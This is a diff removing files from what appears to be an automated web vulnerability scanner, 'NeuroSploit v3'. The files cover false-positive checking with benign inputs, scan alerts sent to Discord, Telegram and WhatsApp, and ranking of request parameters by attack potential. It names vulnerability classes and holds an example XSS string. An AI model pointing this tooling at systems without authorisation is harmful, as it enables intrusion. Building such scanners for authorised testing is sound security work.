The key insight: if the application responds identically to "test123" and
to "<script>alert(1)</script>", then the XSS payload was NOT processed
the application simply ignores or sanitizes the parameter entirely.
"""
# Benign values that should NEVER trigger a vulnerability
BENIGN_PAYLOADS: Dict[str, List[str]] = {
# XSS: plain text, no special chars
"xss_reflected": ["test123", "hello world"],
"xss_stored": ["test123", "hello world"],
"xss_dom": ["test123", "hello world"],
"xss": ["test123", "hello world"],
# SQLi: normal numeric/text values
"sqli": ["1", "test"],
"sqli_error": ["1", "test"],
"sqli_union": ["1", "test"],
"sqli_blind": ["1", "test"],
"sqli_time": ["1", "test"],
# SSRF: safe external URL or plain text
"ssrf": ["https://www.example.com", "test"],
"ssrf_cloud": ["https://www.example.com", "test"],
# LFI: safe existing page or plain text
"lfi": ["index.html", "test.txt"],
"path_traversal": ["index.html", "test.txt"],
# SSTI: plain text, no template syntax
"ssti": ["hello", "12345"],
# RCE: plain text, no shell metacharacters
"rce": ["test", "hello"],
"command_injection": ["test", "hello"],
# Open redirect: safe internal URL
"open_redirect": ["/", "/index.html"],
# CRLF: normal header value
"crlf_injection": ["test-value", "normal"],
"header_injection": ["test-value", "normal"],
# XXE: plain text (no XML entities)
"xxe": ["test", "hello"],
# NoSQL: normal value
"nosql_injection": ["test", "1"],
# Host header: normal hostname
"host_header_injection": ["localhost", "example.com"],
# Default for any unlisted type
"default": ["test123", "benign_value"],
}
# Body length similarity threshold (percentage)
LENGTH_THRESHOLD_PCT = 5.0 # Within 5% = "same"
async def run_controls(
self,
url: str,
param: str,
method: str,
vuln_type: str,
attack_response: Dict,
make_request_fn: Callable,
baseline: Optional[Dict] = None,
injection_point: str = "parameter",
) -> NegativeControlResult:
"""Run negative control tests and compare with the attack response.
Args:
url: Target URL
param: Parameter name being tested
method: HTTP method
vuln_type: Vulnerability type
attack_response: The response from the attack payload
make_request_fn: Async function to make HTTP requests
baseline: Optional baseline response
injection_point: Where payload is injected (parameter, header, body, path)
Returns:
NegativeControlResult with same_behavior flag and details
"""
results: List[ControlTestResult] = []
controls_matching = 0
attack_status = attack_response.get("status", 0)
attack_body = attack_response.get("body", "")
attack_length = len(attack_body)
attack_hash = hashlib.md5(
attack_body.encode("utf-8", errors="replace")
).hexdigest()
# Get benign payloads for this vuln type
base_type = vuln_type.split("_")[0] if "_" in vuln_type else vuln_type
benign_values = self.BENIGN_PAYLOADS.get(
vuln_type,
self.BENIGN_PAYLOADS.get(base_type, self.BENIGN_PAYLOADS["default"])
)
# Control 1: Benign payload
for benign in benign_values[:2]:
try:
control_resp = await self._send_control(
url, param, method, benign, make_request_fn, injection_point
)
if control_resp:
result = self._compare_responses(
"benign", benign, attack_status, attack_length,
attack_hash, control_resp
)
results.append(result)
if result.same_behavior:
controls_matching += 1
except Exception as e:
logger.debug(f"Negative control (benign) failed: {e}")
# Control 2: Empty value
try:
control_resp = await self._send_control(
url, param, method, "", make_request_fn, injection_point
)
if control_resp:
result = self._compare_responses(
"empty", "", attack_status, attack_length,
attack_hash, control_resp
)
results.append(result)
if result.same_behavior:
controls_matching += 1
except Exception as e:
logger.debug(f"Negative control (empty) failed: {e}")
# Control 3: Request without the parameter entirely (if applicable)
if injection_point == "parameter" and param:
try:
control_resp = await self._send_without_param(
url, param, method, make_request_fn
)
if control_resp:
result = self._compare_responses(
"no_param", "(omitted)", attack_status, attack_length,
attack_hash, control_resp
)
results.append(result)
if result.same_behavior:
controls_matching += 1
except Exception as e:
logger.debug(f"Negative control (no_param) failed: {e}")
# Determine overall same_behavior
controls_run = len(results)
same_behavior = controls_matching > 0
# Build detail string
if same_behavior:
matching_types = [r.control_type for r in results if r.same_behavior]
detail = (f"NEGATIVE CONTROL FAILED: {controls_matching}/{controls_run} "
f"controls show same behavior as attack ({', '.join(matching_types)})")
else:
detail = f"Negative controls passed: 0/{controls_run} controls match attack response"
return NegativeControlResult(
same_behavior=same_behavior,
controls_run=controls_run,
controls_matching=controls_matching,
confidence_adjustment=-60 if same_behavior else 20,
results=results,
detail=detail,
)
async def _send_control(
self,
url: str,
param: str,
method: str,
value: str,
make_request_fn: Callable,
injection_point: str,
) -> Optional[Dict]:
"""Send a control request with the given value."""
if injection_point == "parameter":
return await make_request_fn(url, method, {param: value})
elif injection_point == "header":
# For header injection, we'd need to pass custom headers
# Fall back to parameter injection for control testing
return await make_request_fn(url, method, {param: value})
elif injection_point == "path":
# For path injection, append benign value to path
parsed = urlparse(url)
control_url = urlunparse(parsed._replace(
path=parsed.path.rstrip("/") + "/" + value
))
return await make_request_fn(control_url, method, {})
elif injection_point == "body":
return await make_request_fn(url, method, {param: value})
else:
return await make_request_fn(url, method, {param: value})
async def _send_without_param(
self,
url: str,
param: str,
method: str,
make_request_fn: Callable,
) -> Optional[Dict]:
"""Send request without the tested parameter."""
# Strip the param from URL query string if present
parsed = urlparse(url)
if parsed.query:
params = parse_qs(parsed.query, keep_blank_values=True)
params.pop(param, None)
new_query = urlencode(params, doseq=True)
clean_url = urlunparse(parsed._replace(query=new_query))
else:
clean_url = url
return await make_request_fn(clean_url, method, {})
def _compare_responses(
self,
control_type: str,
control_value: str,
attack_status: int,
attack_length: int,
attack_hash: str,
control_response: Dict,
) -> ControlTestResult:
"""Compare a control response against the attack response."""
control_status = control_response.get("status", 0)
control_body = control_response.get("body", "")
control_length = len(control_body)
control_hash = hashlib.md5(
control_body.encode("utf-8", errors="replace")
).hexdigest()
# Status code match
status_match = (attack_status == control_status)
# Body hash exact match
hash_match = (attack_hash == control_hash)
# Body length similarity
if attack_length == 0 and control_length == 0:
length_similar = True
elif attack_length == 0 or control_length == 0:
length_similar = False
else:
diff_pct = abs(attack_length - control_length) / max(attack_length, 1) * 100
length_similar = diff_pct <= self.LENGTH_THRESHOLD_PCT
# Same behavior if status matches AND (exact hash match OR length similar)
same_behavior = status_match and (hash_match or length_similar)
detail = (f"{control_type}('{control_value[:30]}'): "
f"status {'=' if status_match else '!'}= {control_status}, "
f"len {control_length} "
f"({'same' if length_similar else 'different'} from {attack_length})"
f"{', EXACT MATCH' if hash_match else ''}")
return ControlTestResult(
control_type=control_type,
control_value=control_value[:50],
status_match=status_match,
length_similar=length_similar,
hash_match=hash_match,
same_behavior=same_behavior,
detail=detail,
)
@@ -1,308 +0,0 @@
"""
NeuroSploit v3 - Multi-Channel Notification Manager
Sends scan event alerts to Discord, Telegram, and WhatsApp (Twilio).
Hooks into the existing WebSocket broadcast infrastructure as event source.
All channels are disabled by default (opt-in via .env).
Uses only aiohttp (already a dependency) for HTTP calls.
"""
import asyncio
import base64
import logging
import os
from datetime import datetime
from enum import Enum
from typing import Any, Dict, List, Optional
from urllib.parse import quote
import aiohttp
logger = logging.getLogger(__name__)
class NotificationEvent(Enum):
SCAN_STARTED = "scan_started"
VULN_FOUND = "vuln_found"
SCAN_COMPLETED = "scan_completed"
SCAN_FAILED = "scan_failed"
# Severity → Discord embed color
SEVERITY_COLORS = {
"critical": 0xFF0000,
"high": 0xFF6600,
"medium": 0xFFCC00,
"low": 0x33CC33,
"info": 0x3399FF,
}
class NotificationManager:
"""Async multi-channel notification dispatcher.
Sends fire-and-forget notifications to configured channels.
Never blocks the scan flow all errors are swallowed and logged.
"""
def __init__(self):
self.reload_config()
def reload_config(self):
"""(Re)load configuration from environment variables."""
self.enabled = os.getenv("ENABLE_NOTIFICATIONS", "false").lower() == "true"
# Discord
self.discord_webhook = os.getenv("DISCORD_WEBHOOK_URL", "").strip()
# Telegram
self.telegram_token = os.getenv("TELEGRAM_BOT_TOKEN", "").strip()
self.telegram_chat_id = os.getenv("TELEGRAM_CHAT_ID", "").strip()
# WhatsApp (Twilio)
self.twilio_sid = os.getenv("TWILIO_ACCOUNT_SID", "").strip()
self.twilio_token = os.getenv("TWILIO_AUTH_TOKEN", "").strip()
self.twilio_from = os.getenv("TWILIO_FROM_NUMBER", "").strip()
self.twilio_to = os.getenv("TWILIO_TO_NUMBER", "").strip()
# Severity filter
raw = os.getenv("NOTIFICATION_SEVERITY_FILTER", "critical,high").strip()
self.severity_filter = set(s.strip() for s in raw.split(",") if s.strip())
@property
def has_discord(self) -> bool:
return bool(self.discord_webhook)
@property
def has_telegram(self) -> bool:
return bool(self.telegram_token and self.telegram_chat_id)
@property
def has_whatsapp(self) -> bool:
return bool(self.twilio_sid and self.twilio_token and self.twilio_from and self.twilio_to)
async def notify(self, event: NotificationEvent, data: Dict[str, Any]):
"""Send notification to all configured channels.
For VULN_FOUND events, respects the severity filter.
"""
if not self.enabled:
return
# Severity filter for vulnerability findings
if event == NotificationEvent.VULN_FOUND:
severity = data.get("severity", "").lower()
if severity not in self.severity_filter:
return
tasks = []
if self.has_discord:
tasks.append(self._send_discord(event, data))
if self.has_telegram:
tasks.append(self._send_telegram(event, data))
if self.has_whatsapp:
tasks.append(self._send_whatsapp(event, data))
if tasks:
await asyncio.gather(*tasks, return_exceptions=True)
# ── Discord ──────────────────────────────────────────────────────
async def _send_discord(self, event: NotificationEvent, data: Dict):
"""Send Discord webhook with rich embed."""
try:
embed = self._build_discord_embed(event, data)
payload = {"embeds": [embed]}
async with aiohttp.ClientSession() as session:
async with session.post(
self.discord_webhook,
json=payload,
timeout=aiohttp.ClientTimeout(total=10),
) as resp:
if resp.status not in (200, 204):
body = await resp.text()
logger.warning(f"Discord notification failed ({resp.status}): {body[:200]}")
except Exception as e:
logger.warning(f"Discord notification error: {e}")
def _build_discord_embed(self, event: NotificationEvent, data: Dict) -> Dict:
"""Build Discord embed object."""
ts = datetime.utcnow().isoformat()
if event == NotificationEvent.SCAN_STARTED:
return {
"title": "Scan Started",
"description": f"Target: `{data.get('target', 'unknown')}`",
"color": 0x3399FF,
"timestamp": ts,
"footer": {"text": "NeuroSploit v3"},
}
elif event == NotificationEvent.VULN_FOUND:
severity = data.get("severity", "medium").lower()
return {
"title": f"{severity.upper()}: {data.get('title', 'Vulnerability Found')}",
"description": data.get("description", "")[:500] or f"Endpoint: `{data.get('endpoint', '')}`",
"color": SEVERITY_COLORS.get(severity, 0xFFCC00),
"fields": [
{"name": "Severity", "value": severity.upper(), "inline": True},
{"name": "Type", "value": data.get("vulnerability_type", "unknown"), "inline": True},
{"name": "Endpoint", "value": f"`{data.get('endpoint', 'N/A')}`", "inline": False},
],
"timestamp": ts,
"footer": {"text": "NeuroSploit v3"},
}
elif event == NotificationEvent.SCAN_COMPLETED:
total = data.get("total_vulnerabilities", 0)
crit = data.get("critical", 0)
high = data.get("high", 0)
med = data.get("medium", 0)
return {
"title": "Scan Completed",
"description": (
f"**{total}** vulnerabilities found\n"
f"Critical: **{crit}** | High: **{high}** | Medium: **{med}**"
),
"color": 0x00CC00 if total == 0 else 0xFF6600,
"timestamp": ts,
"footer": {"text": "NeuroSploit v3"},
}
elif event == NotificationEvent.SCAN_FAILED:
return {
"title": "Scan Failed",
"description": f"Error: {data.get('error', 'Unknown error')[:500]}",
"color": 0xFF0000,
"timestamp": ts,
"footer": {"text": "NeuroSploit v3"},
}
return {"title": event.value, "color": 0x999999, "timestamp": ts}
# ── Telegram ─────────────────────────────────────────────────────
async def _send_telegram(self, event: NotificationEvent, data: Dict):
"""Send Telegram message via Bot API."""
try:
text = self._build_telegram_text(event, data)
url = f"https://api.telegram.org/bot{self.telegram_token}/sendMessage"
payload = {
"chat_id": self.telegram_chat_id,
"text": text,
"parse_mode": "Markdown",
}
async with aiohttp.ClientSession() as session:
async with session.post(
url, json=payload,
timeout=aiohttp.ClientTimeout(total=10),
) as resp:
if resp.status != 200:
body = await resp.text()
logger.warning(f"Telegram notification failed ({resp.status}): {body[:200]}")
except Exception as e:
logger.warning(f"Telegram notification error: {e}")
def _build_telegram_text(self, event: NotificationEvent, data: Dict) -> str:
"""Build Telegram message text."""
if event == NotificationEvent.SCAN_STARTED:
return f"*Scan Started*\nTarget: `{data.get('target', 'unknown')}`"
elif event == NotificationEvent.VULN_FOUND:
sev = data.get("severity", "medium").upper()
return (
f"*{sev}: {data.get('title', 'Vulnerability Found')}*\n"
f"Type: {data.get('vulnerability_type', 'unknown')}\n"
f"Endpoint: `{data.get('endpoint', 'N/A')}`"
)
elif event == NotificationEvent.SCAN_COMPLETED:
total = data.get("total_vulnerabilities", 0)
crit = data.get("critical", 0)
high = data.get("high", 0)
return (
f"*Scan Completed*\n"
f"Vulnerabilities: *{total}*\n"
f"Critical: {crit} | High: {high}"
)
elif event == NotificationEvent.SCAN_FAILED:
return f"*Scan Failed*\nError: {data.get('error', 'Unknown')[:300]}"
return f"*{event.value}*"
# ── WhatsApp (Twilio) ────────────────────────────────────────────
async def _send_whatsapp(self, event: NotificationEvent, data: Dict):
"""Send WhatsApp message via Twilio API."""
try:
text = self._build_telegram_text(event, data) # Reuse text format
# Strip markdown for WhatsApp
text = text.replace("*", "").replace("`", "")
url = f"https://api.twilio.com/2010-04-01/Accounts/{self.twilio_sid}/Messages.json"
auth_str = base64.b64encode(
f"{self.twilio_sid}:{self.twilio_token}".encode()
).decode()
form_data = {
"From": f"whatsapp:{self.twilio_from}",
"To": f"whatsapp:{self.twilio_to}",
"Body": text,
}
async with aiohttp.ClientSession() as session:
async with session.post(
url,
data=form_data,
headers={"Authorization": f"Basic {auth_str}"},
timeout=aiohttp.ClientTimeout(total=10),
) as resp:
if resp.status not in (200, 201):
body = await resp.text()
logger.warning(f"WhatsApp notification failed ({resp.status}): {body[:200]}")
except Exception as e:
logger.warning(f"WhatsApp notification error: {e}")
# ── Test ─────────────────────────────────────────────────────────
async def test_channel(self, channel: str) -> Dict:
"""Send a test notification to a specific channel."""
test_data = {
"target": "https://example.com",
"title": "Test Notification",
"severity": "info",
"vulnerability_type": "test",
"endpoint": "/test",
"total_vulnerabilities": 0,
"critical": 0,
"high": 0,
"medium": 0,
"error": "This is a test",
}
event = NotificationEvent.SCAN_STARTED
try:
if channel == "discord":
if not self.has_discord:
return {"success": False, "error": "Discord webhook URL not configured"}
await self._send_discord(event, test_data)
elif channel == "telegram":
if not self.has_telegram:
return {"success": False, "error": "Telegram bot token or chat ID not configured"}
await self._send_telegram(event, test_data)
elif channel == "whatsapp":
if not self.has_whatsapp:
return {"success": False, "error": "Twilio credentials not configured"}
await self._send_whatsapp(event, test_data)
else:
return {"success": False, "error": f"Unknown channel: {channel}"}
return {"success": True, "message": f"Test notification sent to {channel}"}
except Exception as e:
return {"success": False, "error": str(e)}
# Global singleton
notification_manager = NotificationManager()
@@ -1,200 +0,0 @@
"""
NeuroSploit v3 - Parameter Semantic Analyzer
Understands parameter semantics for targeted vulnerability testing.
Classifies parameters by name/value patterns and recommends
which vulnerability types to prioritize for each parameter.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple, Optional
@dataclass
class ParamProfile:
"""Profile of a single parameter."""
name: str
category: str # "id", "file", "url", "query", "auth", "code", "generic"
risk_score: float # 0.0 - 1.0
priority_vulns: List[str] = field(default_factory=list)
test_strategy: str = "default"
value_hint: str = "" # Observed value pattern
class ParameterAnalyzer:
"""Understands parameter semantics for targeted testing.
Instead of testing all parameters equally (params[:5]), this module
ranks parameters by attack potential and recommends specific vuln
types to test for each parameter.
"""
PARAM_SEMANTICS = {
"id_params": {
"names": ["id", "uid", "user_id", "userid", "account_id", "accountid",
"order_id", "orderid", "item_id", "itemid", "product_id",
"productid", "post_id", "comment_id", "doc_id", "resource_id",
"pid", "oid", "cid", "rid"],
"vuln_types": ["idor", "bola", "bfla", "sqli_error", "sqli_blind"],
"risk_score": 0.85,
"test_strategy": "increment_decrement",
},
"file_params": {
"names": ["file", "path", "filepath", "filename", "doc", "document",
"page", "include", "template", "tmpl", "tpl", "view",
"load", "read", "src", "source", "content", "folder",
"directory", "dir", "attachment"],
"vuln_types": ["lfi", "path_traversal", "arbitrary_file_read", "rfi",
"file_upload"],
"risk_score": 0.90,
"test_strategy": "file_traversal",
},
"url_params": {
"names": ["url", "redirect", "redirect_url", "redirect_uri", "next",
"return", "returnto", "return_url", "callback", "goto",
"link", "ref", "referer", "dest", "destination", "target",
"uri", "continue", "forward", "out", "checkout_url"],
"vuln_types": ["ssrf", "open_redirect", "ssrf_cloud"],
"risk_score": 0.85,
"test_strategy": "url_injection",
},
"query_params": {
"names": ["q", "query", "search", "keyword", "keywords", "term",
"filter", "find", "lookup", "s", "text", "input",
"name", "title", "description"],
"vuln_types": ["sqli_error", "sqli_blind", "sqli_union", "nosql_injection",
"xss_reflected", "ssti"],
"risk_score": 0.75,
"test_strategy": "injection",
},
"auth_params": {
"names": ["token", "auth", "auth_token", "access_token", "key",
"api_key", "apikey", "session", "session_id", "sessionid",
"jwt", "bearer", "secret", "password", "passwd", "pwd"],
"vuln_types": ["jwt_manipulation", "auth_bypass", "session_fixation",
"broken_authentication"],
"risk_score": 0.80,
"test_strategy": "auth_manipulation",
},
"code_params": {
"names": ["cmd", "exec", "command", "code", "eval", "expression",
"run", "shell", "execute", "ping", "ip", "host",
"hostname", "domain"],
"vuln_types": ["command_injection", "ssti", "rce",
"expression_language_injection"],
"risk_score": 0.95,
"test_strategy": "code_execution",
},
"format_params": {
"names": ["format", "type", "content_type", "output", "ext",
"mime", "render", "engine", "processor"],
"vuln_types": ["ssti", "xxe", "insecure_deserialization"],
"risk_score": 0.70,
"test_strategy": "format_manipulation",
},
"sort_params": {
"names": ["sort", "sortby", "sort_by", "order", "orderby",
"order_by", "column", "col", "field", "group",
"groupby", "group_by", "limit", "offset"],
"vuln_types": ["sqli_error", "sqli_blind"],
"risk_score": 0.65,
"test_strategy": "sql_injection",
},
}
# Value patterns that indicate specific vulnerability types
VALUE_PATTERNS = {
r"^\d+$": {"category": "numeric_id", "vulns": ["idor", "bola", "sqli_error"]},
r"^[a-f0-9\-]{32,}$": {"category": "uuid", "vulns": ["idor"]},
r"^https?://": {"category": "url_value", "vulns": ["ssrf", "open_redirect"]},
r"[/\\]": {"category": "path_value", "vulns": ["lfi", "path_traversal"]},
r"\.(?:php|asp|jsp|html|xml|json)$": {"category": "file_ext", "vulns": ["lfi", "rfi"]},
r"^eyJ": {"category": "jwt_token", "vulns": ["jwt_manipulation"]},
r"<[^>]+>": {"category": "html_value", "vulns": ["xss_reflected", "xss_stored"]},
r"(?:SELECT|INSERT|UPDATE|DELETE)\s": {"category": "sql_fragment", "vulns": ["sqli_error"]},
}
def classify_parameter(self, name: str, value: str = "") -> ParamProfile:
"""Classify a parameter by name + value analysis."""
name_lower = name.lower().strip()
# Check name-based semantics
for category, config in self.PARAM_SEMANTICS.items():
if name_lower in config["names"]:
return ParamProfile(
name=name,
category=category.replace("_params", ""),
risk_score=config["risk_score"],
priority_vulns=list(config["vuln_types"]),
test_strategy=config["test_strategy"],
)
# Check partial name matches
for category, config in self.PARAM_SEMANTICS.items():
for pattern_name in config["names"]:
if pattern_name in name_lower or name_lower in pattern_name:
return ParamProfile(
name=name,
category=category.replace("_params", ""),
risk_score=config["risk_score"] * 0.8, # Lower confidence for partial match
priority_vulns=list(config["vuln_types"]),
test_strategy=config["test_strategy"],
)
# Check value-based patterns
if value:
for pattern, info in self.VALUE_PATTERNS.items():
if re.search(pattern, value, re.IGNORECASE):
return ParamProfile(
name=name,
category=info["category"],
risk_score=0.65,
priority_vulns=info["vulns"],
test_strategy="value_based",
value_hint=info["category"],
)
# Generic parameter — still testable
return ParamProfile(
name=name,
category="generic",
risk_score=0.40,
priority_vulns=["xss_reflected", "sqli_error"],
test_strategy="default",
)
def rank_parameters(self, params: Dict[str, str]) -> List[Tuple[str, float, List[str]]]:
"""Rank parameters by attack potential.
Args:
params: Dict of param_name param_value
Returns:
Sorted list of (name, risk_score, priority_vulns), highest risk first
"""
rankings = []
for name, value in params.items():
profile = self.classify_parameter(name, value if isinstance(value, str) else "")
rankings.append((name, profile.risk_score, profile.priority_vulns))
# Sort by risk score descending
rankings.sort(key=lambda x: x[1], reverse=True)
return rankings
def get_test_strategy(self, param_name: str) -> str:
"""Return recommended test strategy for a parameter."""
profile = self.classify_parameter(param_name)
return profile.test_strategy
def get_vuln_types_for_param(self, param_name: str, param_value: str = "",
max_types: int = 5) -> List[str]:
"""Return vuln types most relevant to this parameter."""
profile = self.classify_parameter(param_name, param_value)
return profile.priority_vulns[:max_types]
def get_high_risk_params(self, params: Dict[str, str],
threshold: float = 0.7) -> List[str]:
"""Return only parameters above the risk threshold."""
rankings = self.rank_parameters(params)
return [name for name, score, _ in rankings if score >= threshold]

Some files were not shown because too many files have changed in this diff Show More